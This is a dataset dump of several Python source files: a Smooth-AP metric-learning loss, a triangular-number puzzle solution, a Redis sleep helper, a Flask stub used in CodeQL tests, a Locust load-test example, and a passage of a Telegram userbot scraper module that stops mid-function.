| hexsha | size | ext | lang | max_stars_repo_path | max_stars_repo_name | max_stars_repo_head_hexsha | max_stars_repo_licenses | max_stars_count | max_stars_repo_stars_event_min_datetime | max_stars_repo_stars_event_max_datetime | max_issues_repo_path | max_issues_repo_name | max_issues_repo_head_hexsha | max_issues_repo_licenses | max_issues_count | max_issues_repo_issues_event_min_datetime | max_issues_repo_issues_event_max_datetime | max_forks_repo_path | max_forks_repo_name | max_forks_repo_head_hexsha | max_forks_repo_licenses | max_forks_count | max_forks_repo_forks_event_min_datetime | max_forks_repo_forks_event_max_datetime | content | avg_line_length | max_line_length | alphanum_fraction |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| stringlengths 40-40 | int64 3-1.03M | stringclasses 10 values | stringclasses 1 value | stringlengths 3-972 | stringlengths 6-130 | stringlengths 40-78 | listlengths 1-10 | int64 1-191k ⌀ | stringlengths 24-24 ⌀ | stringlengths 24-24 ⌀ | stringlengths 3-972 | stringlengths 6-130 | stringlengths 40-78 | listlengths 1-10 | int64 1-116k ⌀ | stringlengths 24-24 ⌀ | stringlengths 24-24 ⌀ | stringlengths 3-972 | stringlengths 6-130 | stringlengths 40-78 | listlengths 1-10 | int64 1-105k ⌀ | stringlengths 24-24 ⌀ | stringlengths 24-24 ⌀ | stringlengths 3-1.03M | float64 1.13-941k | int64 2-941k | float64 0-1 |
| 629d20ca0042c3dac8bb53e45b950962e6649a0a | 5,394 | py | Python | src/pytorch_metric_learning/losses/smoothap.py | interestingzhuo/pytorch-metric-learning | 8344974974a6946ddf65e3f4c12e1c72763f17a4 | ["MIT"] | 188 | 2020-07-14T15:04:37.000Z | 2022-03-18T11:58:59.000Z | src/Smooth_AP_loss.py | elias-ramzi/Smooth_AP | 46b6cf0ddef2041345ec75f722673929d5ed5def | ["MIT"] | 24 | 2020-07-25T07:27:49.000Z | 2021-08-10T11:34:58.000Z | src/Smooth_AP_loss.py | elias-ramzi/Smooth_AP | 46b6cf0ddef2041345ec75f722673929d5ed5def | ["MIT"] | 32 | 2020-07-16T11:06:22.000Z | 2022-03-12T18:19:56.000Z |
# requirements:
# python 3.x
# torch = 1.1.0
import torch
def sigmoid(tensor, temp=1.0):
""" temperature controlled sigmoid
takes as input a torch tensor (tensor) and passes it through a sigmoid, controlled by temperature: temp
"""
exponent = -tensor / temp
# clamp the input tensor for stability
exponent = torch.clamp(exponent, min=-50, max=50)
y = 1.0 / (1.0 + torch.exp(exponent))
return y
def compute_aff(x):
"""computes the affinity matrix between an input vector and itself"""
return torch.mm(x, x.t())
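# NOTE: torch.mm(x, x.t()) gives raw dot products; these equal cosine
# similarities only when the rows of x are L2-normalized first, e.g.
#   x = torch.nn.functional.normalize(x, p=2, dim=1)
# The SmoothAP docstring's "cosine similarity" wording assumes such inputs.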
class SmoothAP(torch.nn.Module):
"""PyTorch implementation of the Smooth-AP loss.
implementation of the Smooth-AP loss. Takes as input the mini-batch of CNN-produced feature embeddings and returns
the value of the Smooth-AP loss. The mini-batch must be formed of a defined number of classes. Each class must
have the same number of instances represented in the mini-batch and must be ordered sequentially by class.
e.g. the labels for a mini-batch with batch size 9, and 3 represented classes (A,B,C) must look like:
labels = ( A, A, A, B, B, B, C, C, C)
(the order of the classes however does not matter)
For each instance in the mini-batch, the loss computes the Smooth-AP when it is used as the query and the rest of the
mini-batch is used as the retrieval set. The positive set is formed of the other instances in the batch from the
same class. The loss returns the average Smooth-AP across all instances in the mini-batch.
Args:
anneal : float
the temperature of the sigmoid that is used to smooth the ranking function. A low value of the temperature
results in a steep sigmoid, that tightly approximates the heaviside step function in the ranking function.
batch_size : int
the batch size being used during training.
num_id : int
the number of different classes that are represented in the batch.
feat_dims : int
the dimension of the input feature embeddings
Shape:
- Input (preds): (batch_size, feat_dims) (must be a cuda torch float tensor)
- Output: scalar
Examples::
>>> loss = SmoothAP(0.01, 60, 6, 256)
>>> input = torch.randn(60, 256, requires_grad=True).cuda()
>>> output = loss(input)
>>> output.backward()
"""
def __init__(self, anneal, batch_size, num_id, feat_dims):
"""
Parameters
----------
anneal : float
the temperature of the sigmoid that is used to smooth the ranking function
batch_size : int
the batch size being used
num_id : int
the number of different classes that are represented in the batch
feat_dims : int
the dimension of the input feature embeddings
"""
super(SmoothAP, self).__init__()
        assert batch_size % num_id == 0
self.anneal = anneal
self.batch_size = batch_size
self.num_id = num_id
self.feat_dims = feat_dims
def forward(self, preds):
"""Forward pass for all input predictions: preds - (batch_size x feat_dims) """
# ------ differentiable ranking of all retrieval set ------
# compute the mask which ignores the relevance score of the query to itself
mask = 1.0 - torch.eye(self.batch_size)
mask = mask.unsqueeze(dim=0).repeat(self.batch_size, 1, 1)
# compute the relevance scores via cosine similarity of the CNN-produced embedding vectors
sim_all = compute_aff(preds)
sim_all_repeat = sim_all.unsqueeze(dim=1).repeat(1, self.batch_size, 1)
# compute the difference matrix
sim_diff = sim_all_repeat - sim_all_repeat.permute(0, 2, 1)
# pass through the sigmoid
sim_sg = sigmoid(sim_diff, temp=self.anneal) * mask.cuda()
# compute the rankings
sim_all_rk = torch.sum(sim_sg, dim=-1) + 1
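        # NOTE: sim_all_rk[q, i] is a smooth rank: 1 plus a sigmoid-weighted
        # count of gallery items j with s(q, j) > s(q, i); as temp -> 0 the
        # sigmoid approaches the Heaviside step and this becomes the true rank.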
# ------ differentiable ranking of only positive set in retrieval set ------
# compute the mask which only gives non-zero weights to the positive set
xs = preds.view(self.num_id, int(self.batch_size / self.num_id), self.feat_dims)
pos_mask = 1.0 - torch.eye(int(self.batch_size / self.num_id))
pos_mask = pos_mask.unsqueeze(dim=0).unsqueeze(dim=0).repeat(self.num_id, int(self.batch_size / self.num_id), 1, 1)
# compute the relevance scores
sim_pos = torch.bmm(xs, xs.permute(0, 2, 1))
sim_pos_repeat = sim_pos.unsqueeze(dim=2).repeat(1, 1, int(self.batch_size / self.num_id), 1)
# compute the difference matrix
sim_pos_diff = sim_pos_repeat - sim_pos_repeat.permute(0, 1, 3, 2)
# pass through the sigmoid
sim_pos_sg = sigmoid(sim_pos_diff, temp=self.anneal) * pos_mask.cuda()
# compute the rankings of the positive set
sim_pos_rk = torch.sum(sim_pos_sg, dim=-1) + 1
# sum the values of the Smooth-AP for all instances in the mini-batch
ap = torch.zeros(1).cuda()
group = int(self.batch_size / self.num_id)
for ind in range(self.num_id):
pos_divide = torch.sum(sim_pos_rk[ind] / (sim_all_rk[(ind * group):((ind + 1) * group), (ind * group):((ind + 1) * group)]))
ap = ap + ((pos_divide / group) / self.batch_size)
return (1-ap)
| avg_line_length 41.813953 | max_line_length 136 | alphanum_fraction 0.647757 |
| 6bc413a1631fcec745dd8ae99bc6dcf08e416fe8 | 3,018 | py | Python | sport/solutions/bj/10448.py | Epikem/dev-tips | ed5a258334dd18ef505f51e320f7a9f5ee535cf9 | ["MIT"] | null | null | null | sport/solutions/bj/10448.py | Epikem/dev-tips | ed5a258334dd18ef505f51e320f7a9f5ee535cf9 | ["MIT"] | 8 | 2020-04-03T15:33:54.000Z | 2022-03-02T10:24:22.000Z | sport/solutions/bj/10448.py | Epikem/dev-tips | ed5a258334dd18ef505f51e320f7a9f5ee535cf9 | ["MIT"] | null | null | null |
false = False
true = True
null = None
TEST = false
try:
import sys
for arg in sys.argv:
if(arg == 'test'):
print('test mode')
TEST = True
pass
except:
pass
def AddImports(libraryNames):
for libname in libraryNames:
        if isinstance(libname, tuple):
short = libname[1]
libname = libname[0]
else:
short = None
try:
lib = __import__(libname)
except ImportError:
pass
else:
if short:
globals()[short] = lib
else:
globals()[libname] = lib
return True
libnames = ['fileinput', 'codecs', 'operator', 'functools', 'math', 'io', 'platform', 'collections', 'mmap', 'logging', 'logging.handlers']
# libnames = ['math']
AddImports(libnames)
IntellisenseHint = False
if IntellisenseHint:
import fileinput
import codecs
import operator
import functools
import math
import io
import platform
import collections
import mmap
import logging
import logging.handlers
# import defs
class memoized(object):
    """Decorator. Caches a function's return value each time it is called.

    If called later with the same arguments, the cached value is returned
    (not reevaluated).
    """
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
        # collections.Hashable moved to collections.abc (removed in Python 3.10)
        if not isinstance(args, collections.abc.Hashable):
return self.func(*args)
if (args in self.cache):
return self.cache[args]
else:
value = self.func(*args)
self.cache[args] = value
return value
def __repr__(self):
"Return the function's docstring."
return self.func.__doc__
def __get__(self, obj, objtype):
'Support instance methods.'
return functools.partial(self.__call__, obj)
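# Illustrative use of @memoized (a sketch, not part of the original file;
# `fib` is a hypothetical example function):
#
# @memoized
# def fib(n):
#     return n if n < 2 else fib(n - 1) + fib(n - 2)
#
# fib(100)  # returns instantly; intermediate results are cached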
def it(args):
if(TEST): print(args)
# print(args, vargs)
def floatEqual(a,b):
diff = math.fabs(a-b)
if(diff < 1e-10): return True
else: return diff <= 1e-8 * max(math.fabs(a), math.fabs(b))
def ria():
return list(map(int,input().strip(' ').split(' ')))
def solve():
cache = {}
li = [False]* 1001
tris = [1]*1001
cands = [9999]*1001
dons = [9999]*1001
for i in range(1, 1001):
tris[i] = tris[i-1] + i+1
pass
it(tris)
for i in range(1000):
for j in range(1000):
[a,b] = [tris[i], tris[j]]
if(a+b<=1000):
cands[a+b] = a+b
for i in range(1000):
for j in range(1000):
[a,b] = [cands[i], tris[j]]
if(a+b <= 1000):
dons[a+b] = 1
it(dons)
T = ria()[0]
for _ in range(T):
n = ria()[0]
print(1 if dons[n]==1 else 0)
pass
solve()
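# A more direct sketch of the same precomputation (added for clarity; not part
# of the original submission). BOJ 10448 asks whether n is the sum of exactly
# three triangular numbers:
#
# tri = [k * (k + 1) // 2 for k in range(1, 45)]            # T_k up to 990
# two = {a + b for a in tri for b in tri if a + b <= 1000}  # sums of two
# three = {t + s for t in tri for s in two if t + s <= 1000}
# # answer for each n: 1 if n in three else 0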
| avg_line_length 24.942149 | max_line_length 173 | alphanum_fraction 0.519218 |
| f5418b6997ce1b81a0e5f944b2d87e9586638337 | 550 | py | Python | GlobalHelper.py | 825477418/XX | bf46e34749394002eec0fdc65e34c339ce022cab | ["MIT"] | null | null | null | GlobalHelper.py | 825477418/XX | bf46e34749394002eec0fdc65e34c339ce022cab | ["MIT"] | 1 | 2020-06-03T13:54:29.000Z | 2020-06-03T13:54:29.000Z | GlobalHelper.py | 825477418/XX | bf46e34749394002eec0fdc65e34c339ce022cab | ["MIT"] | null | null | null |
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Time : 2018/7/7 2:01
# @Email : billsteve@126.com
# @File : GlobalHelper.py
# @Software : PyCharm
import time
import XX.DB.RedisHelper as credis
import XX.String.StringHelper as cstr
# Global pause feature
def global_sleep(ts=0, redis_conn=None, **kw):
if not redis_conn:
redis_conn = credis.RedisHelper.get_redis_connect(host=kw.get("redis_host", "localhost"))
if not ts:
ts = cstr.str2int(redis_conn.get("k_global_ts"))
ts = ts if ts else 0
time.sleep(ts)
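# Minimal usage sketch (not part of the original file; assumes a reachable
# Redis instance holding a sleep duration in seconds under "k_global_ts"):
#
# global_sleep(ts=5)                      # sleep 5s without touching Redis
# global_sleep(redis_host="127.0.0.1")    # sleep for redis:k_global_ts seconds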
| avg_line_length 27.5 | max_line_length 97 | alphanum_fraction 0.645455 |
| 4bdceb212ed23928b06126eb6471a726df66a78c | 765 | py | Python | python/ql/test/query-tests/Security/lib/flask/__init__.py | robertbrignull/ql | 2ecef33c9d2c9a66b5359b68437c3229fcf54964 | ["MIT"] | 26 | 2020-06-30T03:07:19.000Z | 2022-03-31T03:57:23.000Z | python/ql/test/query-tests/Security/lib/flask/__init__.py | mdisec/codeql | 791f31fa6514c18fcfcba1d685bc2d6393b6f6f6 | ["MIT"] | 2 | 2020-04-06T02:08:30.000Z | 2020-04-06T02:08:31.000Z | python/ql/test/query-tests/Security/lib/flask/__init__.py | mdisec/codeql | 791f31fa6514c18fcfcba1d685bc2d6393b6f6f6 | ["MIT"] | 10 | 2021-03-24T13:09:08.000Z | 2022-02-10T07:39:30.000Z |
from .globals import request
from .globals import current_app
class Flask(object):
# Only some methods mocked, signature copied from
# https://flask.palletsprojects.com/en/1.1.x/api/#flask.Flask
def run(host=None, port=None, debug=None, load_dotenv=True, **options):
pass
def make_response(rv):
pass
def add_url_rule(rule, endpoint=None, view_func=None, provide_automatic_options=None, **options):
pass
class Response(object):
pass
def redirect(location, code=302, Response=None):
pass
def make_response(*args):
if not args:
return current_app.response_class()
if len(args) == 1:
args = args[0]
return current_app.make_response(args)
def escape(txt):
    # Markup is assumed to be provided elsewhere in this test stub; real Flask
    # re-exports it from markupsafe.
    return Markup.escape(txt)
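# Illustrative only (a sketch, not from the original file): stubs like these
# let CodeQL's Python security query tests resolve Flask names without
# installing Flask, e.g. a test snippet such as:
#
#   app = Flask()
#   app.run(debug=True)   # the kind of call a debug-mode security query flags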
| avg_line_length 24.677419 | max_line_length 101 | alphanum_fraction 0.687582 |
| f4f82ad2f8f47d833850437c2267e9c8faab3813 | 67 | py | Python | myUtil/myRedis/__init__.py | mengyingzhou/FlexHTTP | 40a931fa910f3709b9ff79ad5e10ce8c01c1c246 | ["BSD-3-Clause"] | 1 | 2022-03-16T17:19:10.000Z | 2022-03-16T17:19:10.000Z | myUtil/myRedis/__init__.py | mengyingzhou/FlexHTTP | 40a931fa910f3709b9ff79ad5e10ce8c01c1c246 | ["BSD-3-Clause"] | null | null | null | myUtil/myRedis/__init__.py | mengyingzhou/FlexHTTP | 40a931fa910f3709b9ff79ad5e10ce8c01c1c246 | ["BSD-3-Clause"] | null | null | null |
from .redis_row import RedisRow
from .redis_table import RedisTable
| avg_line_length 33.5 | max_line_length 35 | alphanum_fraction 0.865672 |
| bd2d07e152d75d132183efda952b532e63221d8e | 410 | py | Python | example/simple.py | girishc13/docker-locust | b7b71d737e5f7c383f2fdef2fa2e9c3c8065c2da | ["Apache-2.0"] | 194 | 2017-01-16T16:32:16.000Z | 2022-03-29T04:25:39.000Z | example/simple.py | girishc13/docker-locust | b7b71d737e5f7c383f2fdef2fa2e9c3c8065c2da | ["Apache-2.0"] | 109 | 2017-01-23T10:31:44.000Z | 2021-06-01T10:41:58.000Z | example/simple.py | girishc13/docker-locust | b7b71d737e5f7c383f2fdef2fa2e9c3c8065c2da | ["Apache-2.0"] | 68 | 2017-02-16T19:05:33.000Z | 2021-09-18T16:01:18.000Z |
from locust import HttpLocust
from locust import TaskSet
from locust import task
# For HTML reporting
from locust.web import app
from src import report
app.add_url_rule('/htmlreport', 'htmlreport', report.download_report)
class SimpleBehavior(TaskSet):
@task
def index(self):
self.client.get('/')
class MyLocust(HttpLocust):
task_set = SimpleBehavior
min_wait = 0
max_wait = 0
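# NOTE (illustrative, not from the original file): with the legacy HttpLocust
# API shown here, this file would typically be launched as e.g.:
#   locust -f example/simple.py --host=http://target-under-test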
| avg_line_length 19.52381 | max_line_length 69 | alphanum_fraction 0.731707 |
| 0ea2742bb4374cb98406a9094825226fce5dfd96 | 35,431 | py | Python | userbot/modules/scrapers.py | dedeeinheree/Man-Userbot | 3f84ec55defc9c822513be34f42556ee70069a30 | ["Naumen", "Condor-1.1", "MS-PL"] | null | null | null | userbot/modules/scrapers.py | dedeeinheree/Man-Userbot | 3f84ec55defc9c822513be34f42556ee70069a30 | ["Naumen", "Condor-1.1", "MS-PL"] | null | null | null | userbot/modules/scrapers.py | dedeeinheree/Man-Userbot | 3f84ec55defc9c822513be34f42556ee70069a30 | ["Naumen", "Condor-1.1", "MS-PL"] | 1 | 2021-11-18T07:01:02.000Z | 2021-11-18T07:01:02.000Z |
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
#
# thanks to the owner of X-tra-Telegram for tts fix
#
# Recode by @mrismanaziz
# FROM Man-Userbot
# t.me/SharingUserbot
#
""" Userbot module containing various scrapers. """
import asyncio
import io
import json
import os
import re
import shutil
import time
from asyncio import sleep
from re import findall, match
from urllib.parse import quote_plus
import asyncurban
import barcode
import emoji
import qrcode
import requests
from barcode.writer import ImageWriter
from bs4 import BeautifulSoup
from emoji import get_emoji_regexp
from googletrans import LANGUAGES, Translator
from gtts import gTTS
from gtts.lang import tts_langs
from requests import get
from search_engine_parser import BingSearch, GoogleSearch, YahooSearch
from search_engine_parser.core.exceptions import NoResultsOrTrafficError
from telethon.tl.types import DocumentAttributeAudio, MessageMediaPhoto
from wikipedia import summary
from wikipedia.exceptions import DisambiguationError, PageError
from youtube_dl import YoutubeDL
from youtube_dl.utils import (
ContentTooShortError,
DownloadError,
ExtractorError,
GeoRestrictedError,
MaxDownloadsReached,
PostProcessingError,
UnavailableVideoError,
XAttrMetadataError,
)
from youtube_search import YoutubeSearch

# The names below are used later in this module; these imports are assumed to
# match the upstream userbot codebase (hachoir for media metadata, selenium
# for the carbon screenshots, telethon for the video attribute).
# GOOGLE_CHROME_BIN, CHROME_DRIVER, upload_file and get_video_thumb are also
# referenced further down; they are presumably provided by the userbot
# package's config and utils, which this excerpt does not show.
from hachoir.metadata import extractMetadata
from hachoir.parser import createParser
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from telethon.tl.types import DocumentAttributeVideo
from userbot import (
BOTLOG,
BOTLOG_CHATID,
CMD_HELP,
LOGS,
OCR_SPACE_API_KEY,
REM_BG_API_KEY,
TEMP_DOWNLOAD_DIRECTORY,
bot,
)
from userbot.events import register
from userbot.utils import (
chrome,
edit_delete,
edit_or_reply,
googleimagesdownload,
options,
progress,
)
CARBONLANG = "auto"
TTS_LANG = "id"
TRT_LANG = "id"
TEMP_DOWNLOAD_DIRECTORY = "/root/userbot/.bin"
async def ocr_space_file(
filename, overlay=False, api_key=OCR_SPACE_API_KEY, language="eng"
):
payload = {
"isOverlayRequired": overlay,
"apikey": api_key,
"language": language,
}
with open(filename, "rb") as f:
r = requests.post(
"https://api.ocr.space/parse/image",
files={filename: f},
data=payload,
)
return r.json()
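# NOTE (abbreviated, per the OCR.Space API docs): the JSON returned above looks
# like the following; only ParsedText is consumed by the .ocr handler below.
#   {"ParsedResults": [{"ParsedText": "..."}], "IsErroredOnProcessing": false}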
@register(outgoing=True, pattern=r"^\.crblang (.*)")
async def setlang(prog):
global CARBONLANG
CARBONLANG = prog.pattern_match.group(1)
await prog.edit(f"Bahasa untuk carbon.now.sh mulai {CARBONLANG}")
@register(outgoing=True, pattern="^.carbon")
async def carbon_api(e):
"""A Wrapper for carbon.now.sh"""
await e.edit("`Processing..`")
CARBON = "https://carbon.now.sh/?l={lang}&code={code}"
global CARBONLANG
textx = await e.get_reply_message()
pcode = e.text
if pcode[8:]:
pcode = str(pcode[8:])
elif textx:
pcode = str(textx.message) # Importing message to module
code = quote_plus(pcode) # Converting to urlencoded
await e.edit("`Processing..\n25%`")
if os.path.isfile("/root/userbot/.bin/carbon.png"):
os.remove("/root/userbot/.bin/carbon.png")
url = CARBON.format(code=code, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = GOOGLE_CHROME_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-gpu")
prefs = {"download.default_directory": "/root/userbot/.bin"}
chrome_options.add_experimental_option("prefs", prefs)
driver = webdriver.Chrome(executable_path=CHROME_DRIVER, options=chrome_options)
driver.get(url)
await e.edit("`Processing..\n50%`")
download_path = "/root/userbot/.bin"
driver.command_executor._commands["send_command"] = (
"POST",
"/session/$sessionId/chromium/send_command",
)
params = {
"cmd": "Page.setDownloadBehavior",
"params": {"behavior": "allow", "downloadPath": download_path},
}
driver.execute("send_command", params)
driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
# driver.find_element_by_xpath("//button[contains(text(),'4x')]").click()
# driver.find_element_by_xpath("//button[contains(text(),'PNG')]").click()
await e.edit("`Processing..\n75%`")
# Waiting for downloading
while not os.path.isfile("/root/userbot/.bin/carbon.png"):
await sleep(0.5)
await e.edit("`Processing..\n100%`")
file = "/root/userbot/.bin/carbon.png"
await e.edit("`Uploading..`")
await e.client.send_file(
e.chat_id,
file,
caption="Made using [Carbon](https://carbon.now.sh/about/),\
\na project by [Dawn Labs](https://dawnlabs.io/)",
force_document=True,
reply_to=e.message.reply_to_msg_id,
)
os.remove("/root/userbot/.bin/carbon.png")
driver.quit()
# Removing carbon.png after uploading
await e.delete() # Deleting msg
@register(outgoing=True, pattern=r"^\.img (.*)")
async def img_sampler(event):
"""For .img command, search and return images matching the query."""
await event.edit("`Sedang Mencari Gambar Yang Anda Cari...`")
query = event.pattern_match.group(1)
lim = findall(r"lim=\d+", query)
try:
lim = lim[0]
lim = lim.replace("lim=", "")
query = query.replace("lim=" + lim[0], "")
except IndexError:
lim = 15
response = googleimagesdownload()
# creating list of arguments
arguments = {
"keywords": query,
"limit": lim,
"format": "jpg",
"no_directory": "no_directory",
}
# passing the arguments to the function
paths = response.download(arguments)
lst = paths[0][query]
await event.client.send_file(
await event.client.get_input_entity(event.chat_id), lst
)
shutil.rmtree(os.path.dirname(os.path.abspath(lst[0])))
await event.delete()
@register(outgoing=True, pattern=r"^\.currency ([\d\.]+) ([a-zA-Z]+) ([a-zA-Z]+)")
async def moni(event):
c_from_val = float(event.pattern_match.group(1))
c_from = (event.pattern_match.group(2)).upper()
c_to = (event.pattern_match.group(3)).upper()
try:
response = get(
"https://api.frankfurter.app/latest",
params={"from": c_from, "to": c_to},
).json()
except Exception:
await event.edit("**Error: API is down.**")
return
if "error" in response:
await event.edit(
"**sepertinya ini mata uang asing, yang tidak dapat saya konversi sekarang.**"
)
return
c_to_val = round(c_from_val * response["rates"][c_to], 2)
await event.edit(f"**{c_from_val} {c_from} = {c_to_val} {c_to}**")
@register(outgoing=True, pattern=r"^\.google ([\s\S]*)")
async def gsearch(q_event):
man = await edit_or_reply(q_event, "`Processing...`")
match = q_event.pattern_match.group(1)
page = re.findall(r"-p\d+", match)
lim = re.findall(r"-l\d+", match)
try:
page = page[0]
page = page.replace("-p", "")
match = match.replace("-p" + page, "")
except IndexError:
page = 1
try:
lim = lim[0]
lim = lim.replace("-l", "")
match = match.replace("-l" + lim, "")
lim = int(lim)
if lim <= 0:
lim = int(5)
except IndexError:
lim = 5
smatch = match.replace(" ", "+")
search_args = (str(smatch), int(page))
gsearch = GoogleSearch()
bsearch = BingSearch()
ysearch = YahooSearch()
try:
gresults = await gsearch.async_search(*search_args)
except NoResultsOrTrafficError:
try:
gresults = await bsearch.async_search(*search_args)
except NoResultsOrTrafficError:
try:
gresults = await ysearch.async_search(*search_args)
except Exception as e:
return await edit_delete(man, f"**ERROR:**\n`{e}`", time=10)
msg = ""
for i in range(lim):
if i > len(gresults["links"]):
break
try:
title = gresults["titles"][i]
link = gresults["links"][i]
desc = gresults["descriptions"][i]
msg += f"👉 [{title}]({link})\n`{desc}`\n\n"
except IndexError:
break
await edit_or_reply(
man,
"**Keyword Google Search:**\n`" + match + "`\n\n**Results:**\n" + msg,
link_preview=False,
aslink=True,
linktext=f"**Hasil Pencarian untuk Keyword** `{match}` **adalah** :",
)
@register(outgoing=True, pattern=r"^\.wiki (.*)")
async def wiki(wiki_q):
"""For .wiki command, fetch content from Wikipedia."""
match = wiki_q.pattern_match.group(1)
try:
summary(match)
except DisambiguationError as error:
await wiki_q.edit(f"Ditemukan halaman yang tidak ambigu.\n\n{error}")
return
except PageError as pageerror:
await wiki_q.edit(f"Halaman tidak ditemukan.\n\n{pageerror}")
return
result = summary(match)
if len(result) >= 4096:
with open("output.txt", "w+") as file:
file.write(result)
await wiki_q.client.send_file(
wiki_q.chat_id,
"output.txt",
reply_to=wiki_q.id,
caption="`Output terlalu besar, dikirim sebagai file`",
)
if os.path.exists("output.txt"):
os.remove("output.txt")
return
await wiki_q.edit("**Search:**\n`" + match + "`\n\n**Result:**\n" + result)
@register(outgoing=True, pattern=r"^\.ud (.*)")
async def _(event):
if event.fwd_from:
return
await event.edit("processing...")
word = event.pattern_match.group(1)
urban = asyncurban.UrbanDictionary()
try:
mean = await urban.get_word(word)
await event.edit(
"Text: **{}**\n\nBerarti: **{}**\n\nContoh: __{}__".format(
mean.word, mean.definition, mean.example
)
)
except asyncurban.WordNotFoundError:
await event.edit("Tidak ada hasil untuk **" + word + "**")
@register(outgoing=True, pattern=r"^\.tts(?: |$)([\s\S]*)")
async def text_to_speech(query):
"""For .tts command, a wrapper for Google Text-to-Speech."""
textx = await query.get_reply_message()
message = query.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
return await query.edit(
"**Berikan teks atau balas pesan untuk Text-to-Speech!**"
)
try:
gTTS(message, lang=TTS_LANG)
except AssertionError:
return await query.edit(
"**Teksnya kosong.**\n"
"Tidak ada yang tersisa untuk dibicarakan setelah pra-pemrosesan, pembuatan token, dan pembersihan."
)
except ValueError:
return await query.edit("**Bahasa tidak didukung.**")
except RuntimeError:
return await query.edit("**Error saat memuat kamus bahasa.**")
tts = gTTS(message, lang=TTS_LANG)
tts.save("k.mp3")
with open("k.mp3", "rb") as audio:
linelist = list(audio)
linecount = len(linelist)
if linecount == 1:
tts = gTTS(message, lang=TTS_LANG)
tts.save("k.mp3")
with open("k.mp3", "r"):
await query.client.send_file(query.chat_id, "k.mp3", voice_note=True)
os.remove("k.mp3")
await query.delete()
@register(outgoing=True, pattern=r"^\.tr(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
if "trim" in event.raw_text:
return
input_str = event.pattern_match.group(1)
if event.reply_to_msg_id:
previous_message = await event.get_reply_message()
text = previous_message.message
lan = input_str or "id"
elif "|" in input_str:
lan, text = input_str.split("|")
else:
await event.edit("**.tr <kode bahasa>** sambil reply ke pesan")
return
text = emoji.demojize(text.strip())
lan = lan.strip()
translator = Translator()
try:
translated = translator.translate(text, dest=lan)
after_tr_text = translated.text
output_str = """**DITERJEMAHKAN** dari `{}` ke `{}`
{}""".format(
translated.src, lan, after_tr_text
)
await event.edit(output_str)
except Exception as exc:
await event.edit(str(exc))
@register(pattern=r"\.lang (tr|tts) (.*)", outgoing=True)
async def lang(value):
"""For .lang command, change the default langauge of userbot scrapers."""
util = value.pattern_match.group(1).lower()
if util == "tr":
scraper = "Translator"
global TRT_LANG
arg = value.pattern_match.group(2).lower()
if arg in LANGUAGES:
TRT_LANG = arg
LANG = LANGUAGES[arg]
else:
await value.edit(
f"**Kode Bahasa tidak valid !!**\n**Kode bahasa yang tersedia**:\n\n`{LANGUAGES}`"
)
return
elif util == "tts":
scraper = "Text to Speech"
global TTS_LANG
arg = value.pattern_match.group(2).lower()
if arg in tts_langs():
TTS_LANG = arg
LANG = tts_langs()[arg]
else:
await value.edit(
f"**Kode Bahasa tidak valid!!**\n**Kode bahasa yang tersedia**:\n\n`{tts_langs()}`"
)
return
await value.edit(
f"**Bahasa untuk** `{scraper}` **diganti menjadi** `{LANG.title()}`"
)
if BOTLOG:
await value.client.send_message(
BOTLOG_CHATID,
f"**Bahasa untuk** `{scraper}` **diganti menjadi** `{LANG.title()}`",
)
@register(outgoing=True, pattern=r"^\.yt (\d*) *(.*)")
async def yt_search(video_q):
"""For .yt command, do a YouTube search from Telegram."""
if video_q.pattern_match.group(1) != "":
counter = int(video_q.pattern_match.group(1))
if counter > 10:
counter = int(10)
if counter <= 0:
counter = int(1)
else:
counter = int(5)
query = video_q.pattern_match.group(2)
if not query:
await video_q.edit("`Masukkan keyword untuk dicari`")
await video_q.edit("`Processing...`")
try:
results = json.loads(YoutubeSearch(query, max_results=counter).to_json())
except KeyError:
return await video_q.edit(
"`Pencarian Youtube menjadi lambat.\nTidak dapat mencari keyword ini!`"
)
output = f"**Pencarian Keyword:**\n`{query}`\n\n**Hasil:**\n\n"
for i in results["videos"]:
try:
title = i["title"]
link = "https://youtube.com" + i["url_suffix"]
channel = i["channel"]
duration = i["duration"]
views = i["views"]
output += f"[{title}]({link})\nChannel: `{channel}`\nDuration: {duration} | {views}\n\n"
except IndexError:
break
await video_q.edit(output, link_preview=False)
@register(outgoing=True, pattern=r".yt(audio|video) (.*)")
async def download_video(v_url):
"""For .yt command, download media from YouTube and many other sites."""
dl_type = v_url.pattern_match.group(1).lower()
url = v_url.pattern_match.group(2)
await v_url.edit("`Preparing to download...`")
video = False
audio = False
if dl_type == "audio":
opts = {
"format": "bestaudio",
"addmetadata": True,
"key": "FFmpegMetadata",
"writethumbnail": True,
"prefer_ffmpeg": True,
"geo_bypass": True,
"nocheckcertificate": True,
"postprocessors": [
{
"key": "FFmpegExtractAudio",
"preferredcodec": "mp3",
"preferredquality": "320",
}
],
"outtmpl": "%(id)s.%(ext)s",
"quiet": True,
"logtostderr": False,
}
audio = True
elif dl_type == "video":
opts = {
"format": "best",
"addmetadata": True,
"key": "FFmpegMetadata",
"prefer_ffmpeg": True,
"geo_bypass": True,
"nocheckcertificate": True,
"postprocessors": [
{"key": "FFmpegVideoConvertor", "preferedformat": "mp4"}
],
"outtmpl": "%(id)s.%(ext)s",
"logtostderr": False,
"quiet": True,
}
video = True
try:
await v_url.edit("`Fetching data, please wait..`")
with YoutubeDL(opts) as rip:
rip_data = rip.extract_info(url)
except DownloadError as DE:
return await v_url.edit(f"`{str(DE)}`")
except ContentTooShortError:
return await v_url.edit("`The download content was too short.`")
except GeoRestrictedError:
return await v_url.edit(
"`Video is not available from your geographic location "
"due to geographic restrictions imposed by a website.`"
)
except MaxDownloadsReached:
return await v_url.edit("`Max-downloads limit has been reached.`")
except PostProcessingError:
return await v_url.edit("`There was an error during post processing.`")
except UnavailableVideoError:
return await v_url.edit("`Media is not available in the requested format.`")
except XAttrMetadataError as XAME:
